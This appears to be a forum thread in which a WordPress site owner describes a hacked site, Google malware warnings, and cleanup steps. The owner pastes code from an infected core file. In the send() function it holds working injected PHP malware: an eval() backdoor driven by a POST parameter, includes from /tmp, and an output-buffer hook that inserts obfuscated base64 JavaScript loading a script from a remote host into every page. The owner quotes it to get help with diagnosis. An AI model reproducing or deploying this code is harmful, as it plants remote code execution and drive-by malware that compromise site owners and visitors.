ronybigsoc

Ok, well I removed that code from all my theme php’s. Then, I scanned through my root php’s to make sure nothing there had been tinkered with.

Next, I changed all my passwords.

INSTANTLY, the site lets me browse wherever I want to with NO Malware errors.

Thanks all for giving me your input. It really helped me.

Okay, well I’m guessing I need to remove them from all my php files. Luckily, it’s only the main ones.

My guess is that my security rights for those php files/directories are not secure.

CRAP! I just found out that if I click on any of the links on my page, I get a google Malware warning.

It says:

Warning: Visiting this site may harm your computer!

The website at religiontranscends.com contains elements from the site 78.110.175.21, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 78.110.175.21.
Learn more about how to protect yourself from harmful software online.

Okay, I just redid everything from the ground up. I deleted and then re-added my domain. Then installed the wordpress version 2.6.2. Then imported my database and theme. Everything worked fine. Now 3-4 days later out of nowwhere I get this error.

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /hsphere/localblah blahblah/wp-includes/classes.php on line 1572

Is this still an ixwebhosting thing? Was a hacked again because of ixwebhosting? Or is their php version still old and not upgraded and it’s their fault again? (Heard something about that)

If it’s them again please let me know of a hosting company you trust for hosting.

Here’s lines 800-811 – FYI I’m new to this… Don’t talk BIG!

$this->responses[] = $x;
		return $x;
	}

	function send() {
		header('Content-Type: text/xml');
		echo "<?xml version='1.0' standalone='yes'?><?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIApldmFsKHVuZXNjYXBlKCclMkZgJTJGJCUyRSUyRSUyRSQAJTNDI2QmJTY5JTc2JCUyMCFzdCU3OSMlNkN8ZT0mJTY0fiU2OSU3M3AkJTZDQGF5YCUzQSU2RUBvQCU2RWAlNjUlM0UkXG58ZCU2RkAlNjNAJTc1YG0lNjUmbnR8JTJFISU3N2AlNzJpdCElNjUhJTI4ISImJTNDJTJGdCElNjUlNzhAdGElNzJlIWElM0UiKUA7I3YhJTYxciYlMjAkJTY5fiUyQ18sQCU2MSUzRHwlNUIiMiExOC45JTMzfi4lMzIjMCUzMiYuITYhJTMxIyUyMn4sfCUyMiMlMzclMzgjJTJFMSMlMzFgMC5gMTclMzUhLiUzMiElMzEkJTIyfl1gO19APWAlMzEkJTNCJTY5YCU2NiYlMjhAJTY0byQlNjMlNzUlNkR+ZXwlNkUlNzQlMkUlNjNvbyU2QmBpZXwlMkVAJTZEJCU2MSU3NCU2MyU2OCUyOCQlMkZAJTVDYiMlNjh+Z2BmYHRAJTNEJiUzMSUyRiUyOSM9PSU2RUAlNzUlNkNgbCQlMjl+JTY2fCU2RmByJTI4fmkkJTNEJTMwJTNCfCU2OSQlM0MkJTMyJTNCJCU2OSUyQiUyQiUyOSU2NCZvY3wlNzUmJTZEYGVgJTZFIyU3NH4lMkVgd3xyJTY5ISU3NCU2NSMoYCUyMmAlM0MjJTczJTYzJnJpJTcwJCU3NCYlM0VpJTY2JihgJTVGYCUyOSU2NG8lNjMhdSU2RCElNjUlNkUmJTc0YC4mJTc3ciU2OX4lNzRAZSUyOCElNUMlMjJ+JTNDJCU3M0AlNjMlNzImJTY5JTcwdCYlMjAjJTY5fCU2NHw9JTVGfCUyMiUyQiU2OSUyQiYlMjJfJTIwcyU3MmMmPSElMkYlMkYlMjIrIyU2MX4lNUIlNjl8XStAIiUyRmNAcCQlMkZgJTNFfCUzQyU1QyU1QyYvJCU3MyQlNjMjcmklNzAhJTc0JCUzRSElNUMlMjJ8JTI5QCUzQyU1QyMlMkZzYyYlNzIlNjlwJTc0JTNFfCUyMiUyOSUzQlxuIy8jJTJGJTNDJi8hJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cfHxAfCN8YHxcJHxcIXx+fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><wp_ajax>";
		foreach ( $this->responses as $response )
			echo $response;
		echo '</wp_ajax>';
		die();